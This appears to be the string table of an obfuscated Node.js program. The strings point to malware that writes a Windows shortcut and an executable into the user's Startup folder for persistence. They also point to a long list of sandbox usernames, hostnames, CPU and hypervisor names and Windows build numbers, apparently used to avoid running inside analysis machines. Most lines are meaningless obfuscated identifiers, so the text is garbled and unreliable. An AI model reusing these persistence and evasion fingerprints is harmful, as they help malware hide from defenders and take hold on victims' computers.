KxfMU

LbrtS

dfziL

KxfMU

QMmLB

kAIIV

SRMVR

DATUz

xUkeO

LRyxf

kAIIV

UwTaf

kAIIV

PEivQ

SRMVR

bXAPy

6.3.9600

JjiEq

olZzP

JjiEq

SRMVR

DATUz

QCBJP

XueEB

JzMtH

XueEB

2048

XueEB

16a7c1

XueEB

hjiEK

UI32LE

UI32BE

UI16BE

UI8

hex

GUID

UI16LE

HEX

DTSTP

LuPwl

ECRbM

rImfI

GvozR

alloc

writeUInt32LE

ivyUB

alloc

writeUInt32BE

UI16LE

alloc

writeUInt16LE

biAwS

alloc

writeUInt16BE

vDktu

alloc

writeUInt8

HEX

from

jUEDd

xNKDO

split

gHXnL

GvozR

gHXnL

UI16LE

gsBJW

xrSKF

XQTwS

ogYNw

selos

xrSKF

selos

concat

FTIME

zOTYC

eLSxI

Lgzch

jDydb

floor

FLJnb

floor

FLJnb

xrSKF

GvozR

xrSKF

UI32LE

concat

jDSeK

lmVXB

FWUSP

Lgzch

getFullYear

FWUSP

pmyAU

getMonth

lmVXB

getDate

ziajb

XQTwS

fhwff

llQxA

getHours

WTuTG

getMinutes

floor

gxDlJ

getSeconds

ALNLB

XQTwS

concat

STR16

alloc

length

KKETi

length

writeUInt16LE

charCodeAt

jDydb

DHpFs

undefined

TeItd

nftcb

mYAHN

writeFileSync

push

cPnkn

rImfI

RTIPi

2|1|0|4|3|5

\.\

HvpHG

split

uOmhL

substr

length

substr

FyHVe

length

MJhpf

indexOf

aKdbw

split

aKdbw

join

MJhpf

indexOf

split

join

uOmhL

length

uOmhL

substr

UI16LE

STR16

x64

\Fonts\micross.ttf

hex

Washington1

Microsoft Root

test

3|7|6|8|0|4|5|9|2|1

computername

username

C:\

rpcsrv

tmpbuild

LU0TO

_i_

object

YVYZP

CPzoU

zuqHK

KxxIJ

YKqXV

min

UI32LE

00021401-0000-0000-c000-000000000046

FTIME

UI8

GUID

hOHux

BxqkX

DTSTP

fDVmD

xlWIR

LBiLi

RebQJ

ekxuJ

xGWKs

kznoj

SBvSj

PmXEE

FsQzq

ydyEc

length

pQtWh

uAvdR

name

length

name

file

length

file

workdir

length

workdir

args

length

args

icon

length

icon

now

workdir

knuCM

Njmom

ibftY

workdir

bgyet

workdir

indexOf

JnTOL

workdir

floor

hJxWS

pop

file

LHFqE

cSaox

GFzLu

file

indexOf

JnTOL

tQOHl

JnTOL

xNwom

deWdX

file

vWmaJ

aERKY

length

UzHmC

pcntP

file

LHFqE

XulRA

grWGQ

writeFileSync

pf1

readFileSync

file

bgyet

split

flg

HpdqN

flg

name

flg

rPGlF

file

flg

workdir

flg

pRXML

args

flg

pRXML

icon

flg

att

file

JnTOL

gmMlc

outerr

push

att

JnTOL

AbwoN

tOfbC

att

shcm

SjyxJ

show

max

shcm

SjyxJ

show

CbeTO

xGHoA

show

shcm

ZCjti

sQVlc

GUID

BlBPW

sQVlc

UI32LE

flg

sQVlc

ZCjti

att

sQVlc

yBgia

ftc

tGnWh

FTIME

fta

fhfVt

yBgia

ftw

fhfVt

ZCjti

fsz

ZCjti

icidx

fhfVt

ZCjti

shcm

fhfVt

aERKY

hky

bRzBo

aERKY

CSOFY

ZCjti

concat

VmgyY

flg

lZYGc

DZyzH

UI16LE

lTAcx

aERKY

lTAcx

pGrRe

qtDTN

Zwtkv

20d04fe0-3aea-1069-a2d8-08002b30309d

length

substr

xGHoA

KjBJa

qtDTN

aERKY

qtDTN

UI8

push

from

exPsp

CQUic

pGrRe

push

alloc

error

QIFMD

length

UVDdV

JbHuG

length

from

file

SjyxJ

pHLWw

length

tRlYd

UI16LE

exPsp

length

pGrRe

qMiRr

ZCjti

qMiRr

DTSTP

ftw

fQSKs

aERKY

push

fQSKs

pGrRe

rHtkV

aERKY

BEjKk

aERKY

BEjKk

ZCjti

BEjKk

DTSTP

ftc

AkRHY

xkTxt

fta

length

AkRHY

aERKY

EdrPs

length

AkRHY

aERKY

AkRHY

pcntP

UI16LE

AkRHY

UI16LE

concat

writeUInt16LE

length

push

concat

writeUInt16LE

length

push

fYMJi

SFbZN

readFileSync

length

dcosv

length

toString

Zeaqh

from

ZMesM

toString

hex

wTIGW

indexOf

from

dGQvs

toString

Zeaqh

jbmCk

indexOf

COMFg

aERKY

log

pEcSi

writeFileSync

trim

exit

concat

length

writeUInt16LE

pHLWw

length

sInfv

flg

JnTOL

bEtVR

fDVmD

Quad

name

mFUia

aERKY

length

gftxI

STR16

flg

JnTOL

JtWLy

wMJTe

file

AkLDN

aERKY

length

AkLDN

STR16

deBgD

split

prototype

slice

call

qUzbe

dcosv

push

deWdX

pQvpi

vhGqc

xEbDU

deWdX

userdomain

CmWPK

mbcfr

concat

fqnzX

sInfv

flg

JnTOL

vfQCd

BoWIr

LwuLr

workdir

fqnzX

length

MZnwa

aERKY

length

MZnwa

pcntP

cJjHF

SnMJD

sInfv

flg

xGHoA

CNpGI

ZSOdH

name

aERKY

length

UzHmC

pcntP

args

trim

qSeGZ

aERKY

length

qSeGZ

pcntP

SnMJD

GLOKs

flg

xGHoA

JQDgI

RrxPm

dDlGn

fromCharCode

NkLoO

VmgyY

mSWdy

icon

xbxFr

aERKY

length

xbxFr

pcntP

length

yVXcP

UI32LE

concat

JnTOL

HjddJ

xQzpz

writeFileSync

QkLkC

BWvyX

yePSj

ySGse

NImqg

CtcZW

OWvEG

TxcbQ

YlDfT

UXoFA

.txt

readFileSync

toString

trim

.exe

\Microsoft\Windows\Start Menu\Programs\Startup\

.lnk

JiUgk

VbbaM

Ryuue

VbbaM

yZyTM

aup

qNlKm

TBnQu

qNlKm

XIsNT

tmp

OHipI

jTURN

MEPyi

acirL

CuiPP

hLkDK

jTURN

hLkDK

apd

HZfvh

pTIsr

qVCeP

uZNNx

mkdirSync

win32

10.0.17763

299243

6.1.7601

b71c

2bf408

harry johnson

d61484

d0062c

10.0.19044

4f5cec

10.0.19045

bf0760

10.0.22621

2cd67e

c23200

56d4

d33e1f

9ec750

cb0013

5bc06f

6.3.9600

c8b63d

7b7bc2

Xeon

Host1

user

10.0.15063

admin

709b

64ccb5

2be941

f94649

DESKTOP

bf7e

d8716f

04159b

2970

8e776c

e717

033bd9

bea-chi

john doe

e2c5

f4cb33

72f6c0

art-pc

administrator

10.0.18362

NOHID

990d1b

582a34

10.0.17134

NOUID

10.0

9639a3

dillon

peter wilson

10.0.19041

10.0.19043

436f

10.0.22000

a98d

efba14

930d8a

2a4494

a4757d

10.0.18363

badfad

f1dd

10.0.10240

6.1.

1e75

janusz-

f6b8ae

8fdf0b

a.monaldo

9d5196

32b5

9f9d51

56aee3

2b22

74529b

6.1.7600

a592e8

0b6631

97a9d3

fb6ab4

a888

2001f7

my_pc_

AMD EPYC

7e73

ed6464

72e748

e06b

6a29b3

4085c6

804a

frank

3e45fc

46e6f8

work

2652ee

d76211

86438b

e8b9

fca565

f2886f

52acd9

167bfe

275dec

351468

5803c5

3322

bca236

723943

9ca5a0

7aed

b445bf

cc9adb

KVM/QEMU

7e0c8b

e379b3

72c1f0

100

3151

101

b7e24d

b6f4a2

102

471915

103

5a1d

6adf97

104

7c1a

591acb

105

10.0.14393

107

3a83fe

d38e35

108

16a7c1

39549c

109

73a080

11d4d6

112

7f8794

113

1285

b3c775

114

46502a

115

116

f3f0c6

117

alexeyzolotov

6e64

121

122

8920

123

5d0c

bc54f4

124

851c

061613

10.0.16299

13b4

126

953225

john

128

9a50

130

131

52c9

132

9a8599

133

0fdc

cc1a

88dba0

134

shadow-

shadow

135

136

137

24889e

18126e

bot 115 W7 Xeon H 24889e U 18126e

138

139

25cd40

141

10.0.

03fea1

4b33b6

143

5b2e9c

144

10.0.10586

a8776a

e94c92

9ab4de

145

e1e853

146

b1a8

7db39b

3635

1cce9e

6bd1

d864df

bb2e4c

149

150

2253

2293

e8c630

3f9b99

151

bd9ff1

joe smith

154

c037

155

156

anna-

26112

158

379a7d

159

160

3219

9db1e4

161

162

163

azure-

165

570a90

166

32b1d5

167

168

169

gary-pc

stark

170

171

5fd4c0

a739

75c891

173

092f16

48fdf5

174

dd15

175

DESKTOP-JTAPJCC

77bd

177

8726e3

cd4ec1

179

mars-pc

180

181

a30c

6eb45e

182

6cfdbc

b38e56

183

185

95deb5

4f81e3

b75705

187

62efb9

188

189

835669

190

0bd650

6|3|15|0|11|14|7|2|1|13|8|9|12|10|5|4

string

false

C:\

prsv

HfRpI

EIpKA

DMKWn

uLqHQ

wqmiT

KhPcR

dffSs

peQIH

cYiTM

aCnWn

RBOqw

log

mIsdU

pf1

pf2

TSkfY

wpPlA

HfRpI

mkdirSync

isc

existsSync

resolve

argv

resolve

argv

TSkfY

EIpKA

FROXT

statSync

pf1

SLoSD

split

wafoa

LYcAl

TPIcK

GBlBu

Rdgwu

Kohwu

zVgcD

TanuB

d1457b

LYcAl

gFwPL

TanuB

ubcMM

TanuB

ROiut

adzev

JKWvB

win32

WWgwz

gFwPL

DWafV

ubcMM

DWafV

86131a

DWafV

win32

WWgwz

QgCQX

DWafV

6.1.7601

DWafV

11d4d6

rZmhj

indexOf

administrator

DWafV

LYcAl

WWgwz

QgCQX

ubcMM

loxgW

ExBwd

mVAjG

rulZz

d04f74

rulZz

doith

rulZz

LYcAl

indexOf

AMAZING-AVOCADO

RHGLJ

indexOf

dtJPH

MVXop

LYcAl

WWgwz

QgCQX

MVXop

aniKD

jzQdx

hlsxI

SZiMj

LYcAl

WVMFi

QgCQX

XcLmL

AZAkO

hXlfH

AEDcU

HLEpm

AEDcU

LYcAl

wUnoy

gxjPr

PTLCN

AEDcU

jVGGC

qOuag

uiGmx

qOuag

9114

qOuag

LYcAl

cXhMn

qOuag

qfuEl

qOuag

UUirb

yZCnh

LYcAl

UUirb

FHhEZ

769fc7

UUirb

win32

cXhMn

gxjPr

ubcMM

JgHks

gHDRc

eainW

SUcjU

LNmRo

cqJEE

mLypN

LYcAl

ScNoL

ykKif

vEesc

IOeXS

LYtNI

LYcAl

SOoay

LVCsq

OHsvg

bvnIp

DmFQw

JfVIp

win32

uAEsb

gxjPr

indexOf

TKtSZ

RHGLJ

indexOf

ZdQzl

tdnDp

indexOf

WJiRC

DmFQw

LYcAl

uAEsb

gxjPr

ubcMM

OwyqM

JzIgH

PYjGl

win32

uAEsb

gxjPr

uAEsb

indexOf

TKtSZ

XNMaB

ubcMM

FAQhP

vKSwt

c589

vKSwt

611a3e

fFRjr

indexOf

administrator

lIwtL

LYcAl

uAEsb

6.1.7601

CJOmZ

PuBSN

EOPnZ

exsbv

XIjwe

cudKi

indexOf

NOHID

dfntD

indexOf

swTzr

XIjwe

kFkvA

FmxcA

LYcAl

mbYJh

xxfVl

vkpjy

zneaG

PTLCN

indexOf

TKtSZ

LYcAl

vkpjy

6.1.7601

vkpjy

f5faf7

uJNeu

vkpjy

LYcAl

uAEsb

lNKmQ

6.1.7601

bYnVG

dfntD

indexOf

fYSZv

naJbE

indexOf

swTzr

bYnVG

LYcAl

ejLcG

AQpoX

ubcMM

uYnUm

dXLzz

GDxFd

indexOf

TKtSZ

rqWza

a65640

zIfnV

IOeXS

mzMlZ

LYcAl

AQpoX

mzMlZ

XcLmL

mzMlZ

iKPzJ

OlKMz

iKPzJ

35ae2e

SqTkT

TZEHF

SqTkT

LYcAl

GDxFd

xnvbv

wJZgx

6.3.9600

wJZgx

ydaoz

jnvjc

cHbDi

jnvjc

win32

OYPNp

BAzxC

rxjvH

EOPnZ

SefZy

XrwPo

SefZy

dbTTV

SefZy

win32

qfuEl

SefZy

rYJmt

SefZy

646a8b

zPwzT

win32

wZKuy

aFEyM

XcLmL

gAcyp

fOseZ

tpOsy

DCaSH

KPCjM

DCaSH

LYcAl

wZKuy

BAzxC

indexOf

LcTTp

naJbE

indexOf

qRYsb

DCaSH

win32

PTLCN

QcpHD

TmlHK

scivu

12a5b6

rdaWW

SaLSc

TmlHK

GQJxe

LYcAl

ACGfv

MSfis

XcLmL

OXatv

OUWhk

vQKXE

LTgUV

LYcAl

JgQtp

PTLCN

HZeFZ

rjKIO

zlDJg

girgn

LYcAl

ubcMM

zlDJg

JfqlE

TDUHe

indexOf

TKtSZ

LYcAl

ACGfv

KxWEe

ubcMM

naJbE

indexOf

lDkJV

naJbE

indexOf

sSBRg

isArray

VDbJu

length

KxWEe

LYcAl

ACGfv

dEtOa

CeBGU

indexOf

fYSZv

RvIAD

indexOf

swTzr

oGBck

RjpDf

wRYVw

JFWEh

indexOf

TKtSZ

uMfuI

win32

LDDhC

HNuXb

wUCqh

611a3e

TsRyq

ubcMM

TsRyq

LDDhC

indexOf

TKtSZ

LCCoG

indexOf

aZxDi

LCCoG

indexOf

sSBRg

LYcAl

PTLCN

qOacw

qTgjb

BZNiH

UuYwY

ajALe

UuYwY

LYcAl

LDDhC

UuYwY

rJKwG

CeCjW

rJKwG

10.0.18362

KkRtL

2088

UWZEr

indexOf

fYSZv

UWZEr

indexOf

zgdgD

tWnTa

LYcAl

LDDhC

HNuXb

indexOf

InILP

tWnTa

LgwXo

indexOf

Xeon

tWnTa

EOPnZ

50ab44

oiXIk

OGyZm

LYcAl

qsqUz

indexOf

vOuTg

BsAgB

indexOf

zgCBr

oiXIk

LYcAl

oiXIk

hSrGm

RaBuf

DLgmS

2a4494

LYcAl

dAaPt

AbICd

YFVzD

LILiI

VQcso

nnXyq

mPvTZ

LYcAl

yIOAD

GIbXF

gtEbv

fZYig

gtEbv

PUzkU

lApth

LYcAl

qsqUz

HNuXb

6.1.7601

FuxQO

RzZmR

Tlzop

41c07c

qXdhb

LYcAl

HvJAt

10.0.19045

uuhmQ

iwVHs

c39efd

iwVHs

LYcAl

iwVHs

fUkZb

qfuEl

fUkZb

KkKjM

YMrxK

LYcAl

HNuXb

XxcIK

rWUAH

CeCjW

wRYVw

rWUAH

2088

BsAgB

indexOf

fYSZv

BsAgB

indexOf

NOUID

AFUvo

LYcAl

AFUvo

GBlBu

ViDeM

YZpbt

62327b

JuBJs

win32

IlFWw

SKYJq

IlFWw

BqdgS

7f8794

BqdgS

LYcAl

UTBqa

nOWNe

BIuOX

indexOf

10.0

kiVOl

vLyNW

deEXk

HSMcX

indexOf

swTzr

lrrCA

LYcAl

lrrCA

GIbXF

HSMcX

indexOf

fYSZv

lrrCA

tlLNf

lrrCA

LYcAl

UTBqa

nOWNe

PPrrY

indexOf

DESKTOP

JzLqG

zoezH

ZsPJB

LYcAl

rNEoZ

indexOf

fUyiw

zSNmP

indexOf

STRAZNJICA.GRUBUTT

ZsPJB

win32

ZsPJB

10.0.17763

ZsPJB

10.0.19044

ZsPJB

Qhkjm

sxgcy

zSNmP

indexOf

fYSZv

sxgcy

zCVkU

BGwYJ

LYcAl

rNEoZ

UczaO

indexOf

dANnZ

UczaO

indexOf

janusz

pzgQN

LYcAl

gnRUM

eJcMK

indexOf

Xeon

KamwT

10.0.19044

KamwT

ZbboF

indexOf

aZxDi

eCCBP

indexOf

swTzr

ZbboF

LYcAl

ubcMM

ZbboF

SsiSi

RkQzY

zCqHL

RTLsz

LYcAl

10.0.22621

eQhbi

ThbLk

idSYC

db9a51

idSYC

64ca98

LYcAl

eJcMK

FXLGX

ubcMM

CRdgp

kFkvA

zFvwy

qSeVi

ncOvY

win32

OrgrG

indexOf

xhvYN

IiuFl

ubcMM

pvXJM

gnRUM

indexOf

Xeon

pvXJM

LYcAl

CSkir

GIbXF

JxLUF

xcKUN

NwRqL

zWwDe

NwRqL

LYcAl

aoCvi

PTLCN

mkmON

VQrku

VXiff

mpdYB

kPEZf

mpdYB

kRZPW

zuIIc

LYcAl

CshsY

OrgrG

cVxZU

PTLCN

cVxZU

mpLLP

wVABx

LYcAl

ubcMM

wVABx

DPsnP

mVAjG

SYGNt

cd4ee8

bac5dd

vYUGY

7fa24d

vYUGY

nyqwA

egJAo

TyRtq

egJAo

4b418f

egJAo

Fjqsu

vveVx

LYcAl

CshsY

ZwfPH

vveVx

oSzjB

GkkeG

zgATS

atdAk

zgATS

UDbLg

PmSkt

LYcAl

oSigL

indexOf

anna-

kcVLc

sSClf

win32

10.0.19042

esOnO

LIvum

voHZU

LYcAl

CshsY

QmIYm

buomr

ubcMM

jFcpX

QJxmL

jISnO

gGKft

jISnO

FyNVq

eCCBP

indexOf

sSBRg

blIPV

LYcAl

CshsY

cxrAf

eCCBP

indexOf

fUyiw

eCCBP

indexOf

MPuGR

indexOf

sSBRg

dmOfu

win32

ltQHC

ERnfQ

ZnTGO

indexOf

InILP

fwncc

ltQHC

indexOf

TKtSZ

ltQHC

indexOf

APEbL

fwncc

JzLqG

wGnTi

10.0.19044

ZnTGO

indexOf

aZxDi

nWszC

gGKft

nWszC

zWlXD

OzQOS

70b4

qAjsJ

d580

bmHbu

indexOf

sSBRg

qAjsJ

win32

bwSBX

XcLmL

dzNLV

jwlMT

LYcAl

dzNLV

LVCsq

KqAqX

VoBGW

KqAqX

LYcAl

DwXxC

KqAqX

XcLmL

fcRKt

gOLiS

fcRKt

JYVij

fcRKt

LYcAl

fcRKt

PTLCN

AZXPR

xtCHf

gjCtD

xHzyR

rPCUp

LYcAl

ltQHC

rKKda

indexOf

10.0

SKYJq

rPCUp

MdSqH

rPCUp

AfriE

indexOf

fYSZv

xpcqF

indexOf

PdzWs

rPCUp

LYcAl

rPCUp

SKYJq

MAExa

UNqjb

rPCUp

LYcAl

ltQHC

agnxY

ltQHC

indexOf

KVM/QEMU

wxNEZ

JZNLr

LYcAl

xpcqF

indexOf

fUyiw

indexOf

ROKAd

QEAMX

indexOf

swTzr

JZNLr

LYcAl

ltQHC

wLNCx

JZNLr

6.1.7601

JZNLr

4ed984

DICnF

dvlJy

DICnF

LYcAl

DICnF

RaBuf

YoWbp

fRNPW

LkYSt

soUsb

evSTo

LYcAl

ltQHC

JQuvw

ubcMM

FiEqy

GdNBd

XGITv

QEAMX

indexOf

admin

win32

GdNBd

10.0.17763

10.0.19044

uoZYq

oeueP

indexOf

fYSZv

oeueP

LYcAl

ltQHC

wLNCx

oeueP

ubcMM

MEZoZ

pxwmO

IbCzg

abvdQ

GJsNm

HRhcj

oSLXP

LYcAl

xSsww

10.0.19045

asuCL

pQutV

LYcAl

asuCL

qfuEl

gEHME

lyAhO

OqeEN

OKFzh

OqeEN

d6a5b0

OqeEN

LYcAl

fpqZK

AqkjM

OqeEN

GVnrX

qXWxF

OqeEN

win32

fpqZK

indexOf

10.0

OqeEN

LWiYf

deEXk

HGWDA

indexOf

swTzr

LWiYf

win32

fpqZK

AqkjM

LWiYf

EOPnZ

xNLXT

bHQfm

MYeJo

LYcAl

indexOf

DESKTOP-JTAPJCC

bHQfm

LYcAl

qfuEl

PqBSR

ytykJ

huyUd

ytykJ

SqNnw

dELVa

CmdPI

LYcAl

fpqZK

badyQ

ubcMM

mmDkZ

VTyjo

OmSfD

pjTpP

LYcAl

AqkjM

fzZgj

indexOf

10.0

pjTpP

6f2958

indexOf

john

pjTpP

LYcAl

fpqZK

AqkjM

pjTpP

ubcMM

etKmA

FWgOc

etKmA

bwtbE

indexOf

lisa

win32

RuNbx

SKYJq

EBxla

qHVya

Tlpjq

qHVya

LYcAl

fpqZK

AqkjM

fpqZK

indexOf

occcE

qHVya

LErmX

LHYMi

LYcAl

LHYMi

qfuEl

VxQOe

tzoPB

KIsUM

7b7cd2

KIsUM

LYcAl

AqkjM

ubcMM

KIsUM

YzyHQ

fqqhm

indexOf

Xeon

YzyHQ

QJupa

LPgAw

eakhR

win32

AhtPH

PTLCN

wuIMX

mGsxX

WSomW

girgn

WSomW

LYcAl

indexOf

InILP

KyaxT

UWbtt

indexOf

george

MCfSo

BVVOV

LYcAl

BVVOV

iTjkY

10.0.10586

iTjkY

ubcMM

wGOdI

mtxZv

KvghS

indexOf

aZxDi

pOpPW

indexOf

zgdgD

wnKbJ

dBfHx

win32

dBfHx

PTLCN

YLAfo

jCtEG

SlBsw

CzOfU

fVXXn

LYcAl

fqqhm

AqkjM

SlBsw

PTLCN

SlBsw

IxHUN

zvSZo

ftako

ltqLZ

win32

yBYdM

wHFGz

FPNSd

ubcMM

FPNSd

mQsbX

POxDl

indexOf

sSBRg

SRBLD

mQsbX

sFAVB

HPFMa

LYcAl

XcLmL

QIuoX

YrEkE

eSOln

YrEkE

4b9de2

YrEkE

rqFwr

VSMsb

YrEkE

win32

WQRrO

XekYV

Jhjzq

IdHRu

OCHhc

UqyOR

indexOf

fYSZv

indexOf

swTzr

106

LYcAl

ysPgM

WQRrO

utRvB

AbICd

indexOf

dtJPH

JKNoK

LYcAl

utRvB

qfuEl

utRvB

WBkfR

utRvB

hRJuE

mKbym

utRvB

win32

ysPgM

FUvEJ

FQJbQ

6.1.7601

NDEjm

2048

NDEjm

uWFuI

MiaCE

fSrbT

wfFgM

oIxZs

LYcAl

MqgqD

FUvEJ

fSrbT

ubcMM

qEvJZ

AaSjH

b5a0

AaSjH

ruXeX

bUqTm

110

win32

FUvEJ

GHjAf

6.1.7601

fWRaY

bRKAu

indexOf

administrator

111

fWRaY

LYcAl

TUyyk

bfgjT

fIvCc

indexOf

TKtSZ

UqyOR

indexOf

Host1

UqyOR

indexOf

WJiRC

xNGiB

vbXtu

LYcAl

QBrtz

SKYJq

QBrtz

enwmP

QBrtz

dGnaH

aff8

fjxea

LYcAl

pEJhN

indexOf

10.0

bZVfr

jyXWW

zWdnV

nOBdJ

abcf10

jVGKX

gPIwd

nooEo

win32

fIvCc

bfgjT

IbUMg

ubcMM

YfyYh

TyGCt

WxGuz

indexOf

sSBRg

urWmq

rWanO

win32

RfGgw

HFTmU

indexOf

6.1.

HFTmU

indexOf

goatuser

aVzkg

LYcAl

jpAmj

KPbvJ

NolDx

ubcMM

rRTvh

yUjDd

CFbdn

7bf5

DOizz

2cb5a5

DOizz

zLQsi

bUJZF

BjPAz

win32

HFTmU

indexOf

CompAlexey

zScuF

indexOf

oaXfn

118

XZpbk

LYcAl

pvzZA

PTLCN

IzUiN

MQdYp

orTcV

MQdYp

typyO

747890

119

120

gngIH

win32

DfZEN

9a50

DfZEN

275dec

DfZEN

351468

fApet

aiper

LYcAl

indexOf

CompAlexey

WAuYR

indexOf

oaXfn

HLcOc

aiper

LYcAl

jpAmj

DXgCH

BsiSA

indexOf

InILP

BsiSA

indexOf

fYSZv

ytxhj

qfuEl

pCeCI

gBIgX

ejHcp

0cbc66

eaGkk

ejHcp

win32

Dngef

indexOf

InILP

indexOf

occcE

aMFoM

XoNFE

XcLmL

indexOf

fYSZv

aMFoM

jYnHT

mZJeO

taleT

LYcAl

xyuXn

lAxep

rkJGd

zEpcO

rkJGd

b0f8e1

NXTJF

QzqaA

125

NXTJF

win32

NXTJF

dtaCQ

MQPdx

rfeUH

MQPdx

ab86a1

HHdqr

dc599a

OOjip

win32

CWxWT

bxetw

HHdqr

6.1.7601

KgCfO

indexOf

athEb

127

nfpls

win32

nfpls

ubcMM

EteBW

bwtbE

Dngef

indexOf

lisa

xwuFO

xRSyw

win32

GnVpw

UhZkH

PTLCN

UhZkH

JocBE

JXbcj

129

EoVIT

LYcAl

GnVpw

bxetw

zFPmf

FfPGP

zFPmf

qXWxF

GDRAV

zFPmf

win32

GnVpw

indexOf

KVM/QEMU

jdFFU

CsbJA

YtLom

win32

jLRkm

bxetw

YtLom

ubcMM

PkFMx

PsMVa

indexOf

aZxDi

indexOf

zgdgD

xajXf

FumUj

gFiMu

LYcAl

jLRkm

bxetw

XcLmL

hCYan

leDkE

vSckw

fluGi

bbFyg

snPqE

fluGi

LYcAl

bvChx

ImLKw

bvChx

RHxXa

ZObVK

piwaH

18275d

kZvxL

indexOf

administrator

qhHca

LYcAl

kZvxL

indexOf

InILP

jLRkm

indexOf

EPYC

dkrmK

indexOf

TKtSZ

kZvxL

indexOf

DYNER

LWosO

indexOf

FvLcU

wMphB

win32

dkrmK

zMoPK

TTKHH

ubcMM

byXTc

dkrmK

indexOf

Xeon

indexOf

NOHID

LWosO

indexOf

NOUID

rIROs

byXTc

LYcAl

vuBDN

XjAHD

Jhjzq

XjAHD

HXyrf

ZUERy

a739

DtqlK

xdqpa

LYcAl

vuBDN

zMoPK

xdqpa

ubcMM

GNxrq

LjUoj

ojVSW

ifpMc

tlgVr

bpKnJ

pAaFc

wYWhN

kwYHp

LYcAl

zMoPK

FrpNt

AbICd

10.0.19045

FrpNt

dTIbB

FrpNt

LYcAl

zMoPK

10.0.19045

OqkCJ

e32aca

140

cNwAX

LYcAl

IVWgH

ubcMM

IVWgH

MxhkO

zHnKT

59a422

FCKbN

gKHJI

LYcAl

zMoPK

KvjLM

indexOf

6.1.

indexOf

fYSZv

KvjLM

indexOf

swTzr

142

uXAeF

LYcAl

zMoPK

vgIDw

indexOf

bARVU

uXAeF

JeOmc

b624

ceQLL

OJtSS

ceQLL

HWyjT

HcriV

LYcAl

6.1.7601

ceQLL

vuBDN

dkFQR

cqcXW

a6f2

cqcXW

UqSDH

IwbBw

cqcXW

LYcAl

cqcXW

IBETZ

vgIDw

indexOf

aZxDi

yRZxF

indexOf

zgdgD

IBETZ

RaBuf

IBETZ

nBeVS

OeKLg

KvghS

OeKLg

00181a

fCPBO

iEOdm

yLxTp

XTBlS

iZCfc

yLxTp

129654

f7e0fe

fjlZW

oovdk

LYcAl

kUFFE

tjxMV

NWucp

ubcMM

DGudg

fCmCf

MnULH

LYcAl

MnULH

PTLCN

hMyXK

YdnSH

HRkoM

OKMZw

147

YBlXB

win32

tjxMV

nlhwv

ubcMM

nlhwv

CemQK

nlhwv

hENkA

JOWJC

ZToZR

indexOf

swTzr

148

FjfUv

win32

HhpCs

SsQfU

ubcMM

EYqMo

yHqOb

IsVGp

SduTx

yHqOb

yAvHp

LJbxv

UAsdu

LYcAl

enjUJ

SsQfU

9a50

UAsdu

GVnrX

rZzup

pxBAp

win32

enjUJ

mtmUB

pxBAp

qfuEl

pxBAp

Uylzl

CJoVu

cuWCU

sqvsW

ZmVRy

mtljL

YHhXJ

indexOf

aZxDi

YHhXJ

indexOf

zgdgD

jOBsH

tFRNS

LYcAl

enjUJ

QkmSc

yHKXh

ubcMM

WjKSa

wRYVw

2088

152

WjKSa

LYcAl

WjKSa

GBlBu

WjKSa

YddPN

SUKmZ

hCTIY

9f72

XeVEQ

jLiUH

153

fmMKm

LYcAl

nFdbq

DzBlc

indexOf

fYSZv

indexOf

uFmNa

jnIvx

fmMKm

LYcAl

fmMKm

10.0.22621

fmMKm

bdKyI

bFSnP

kxtSP

bFSnP

KrJur

b4a2c8

NmSjg

LYcAl

ubcMM

KrJur

WpQto

indexOf

aZxDi

WpQto

indexOf

athEb

Yrbsc

RIAAG

LYcAl

oqbeM

AzHrm

indexOf

MhzIQ

RIAAG

EzqpJ

97a9d3

157

gYMkC

LYcAl

oqbeM

gYMkC

SKYJq

RzUnZ

2988b8

gYMkC

tbYIW

gYMkC

LYcAl

oqbeM

AzHrm

gYMkC

ubcMM

SfLoJ

Qfepj

gGKft

Qfepj

HNOfg

indexOf

sSBRg

OAmqQ

LYcAl

oqbeM

aCQtU

WpQto

indexOf

aZxDi

SMKZE

indexOf

WJiRC

Qfepj

10.0.18362

JDxSZ

6.1.7601

YFkWA

LYcAl

oqbeM

aCQtU

sHoho

ubcMM

HqEau

tgrPn

zaKHO

Dtcom

zaKHO

SDqCi

zaKHO

93a77b

MHqJW

zaKHO

LYcAl

OqPnN

aCQtU

UFaet

ySuYo

wRYVw

QRNVb

ZqKoF

mVAjG

JioFu

bpndq

ZiuqO

LYcAl

MvEmA

aCQtU

iUOws

LceQj

JOWJC

SMKZE

indexOf

swTzr

DjetE

LYcAl

CeCjW

NGOaK

164

Jemzi

LYcAl

ZJhcW

SMKZE

indexOf

uGlKU

SMKZE

indexOf

azure

Jemzi

ubcMM

lngmG

ZJhcW

indexOf

TKtSZ

UTWsh

LYcAl

Xcdew

dtaCQ

aYqtc

bVnFT

eGAVm

LYcAl

10.0.22621

jjdem

ykdtl

CiWUI

c350

GQcXj

QMKvd

LYcAl

QMKvd

RaBuf

czKQU

KkKjM

kkjvS

tXqft

LYcAl

Ajijk

aCQtU

miYSf

6.1.7601

wMWuw

IXSaM

lycfT

IXSaM

LYcAl

IXSaM

indexOf

6.1.

indexOf

qlfFI

indexOf

GAseQ

MCPGc

vDPhm

LYcAl

NiIRS

aCQtU

vDPhm

kbhla

ubcMM

kbhla

JzLqG

kbhla

55d8

SMKZE

indexOf

aZxDi

GqYaI

indexOf

zgdgD

nCYcK

LYcAl

10.0.22621

kbhla

keLQZ

lwOZh

172

keLQZ

LYcAl

thpqH

qdKkj

ubcMM

keLQZ

dfpVD

wWNuu

d60869

dfpVD

Renom

SRuAd

dfpVD

win32

vBLeg

ubcMM

vBLeg

tCLMh

vBLeg

nXFIT

HeFkv

vBLeg

LYcAl

qdKkj

HRRBe

ubcMM

bPGsQ

MhVPV

uGHss

otowc

6e6551

GqYaI

indexOf

sSBRg

RTfxC

otowc

LYcAl

otowc

CeCjW

uAiJp

indexOf

JtJrw

176

otowc

LYcAl

SswHv

indexOf

10.0

BbFPl

tvhQL

indexOf

DESKTOP

znzqH

tvhQL

736b19

JboKA

win32

qfuEl

tvhQL

eSOln

tvhQL

sinbV

tvhQL

BHCcz

178

tvhQL

LYcAl

qzadQ

qdKkj

SswHv

indexOf

InILP

iOjDA

indexOf

fYSZv

mVAjG

RiiOk

bac5dd

UoDFX

SSmiq

LYcAl

jkRku

mMjhn

ubcMM

NDEiX

indexOf

CplBP

NDEiX

indexOf

administrator

THXZK

SSmiq

LYcAl

igvrq

SSmiq

mNsLb

zEpcO

mNsLb

QzqaA

XBCIF

qDXbZ

LYcAl

FKoXL

qfuEl

FKoXL

JEbIX

JeePn

aXeGZ

DICEf

Ojlrh

aXeGZ

LYcAl

lknoE

PTLCN

aXeGZ

zoHIY

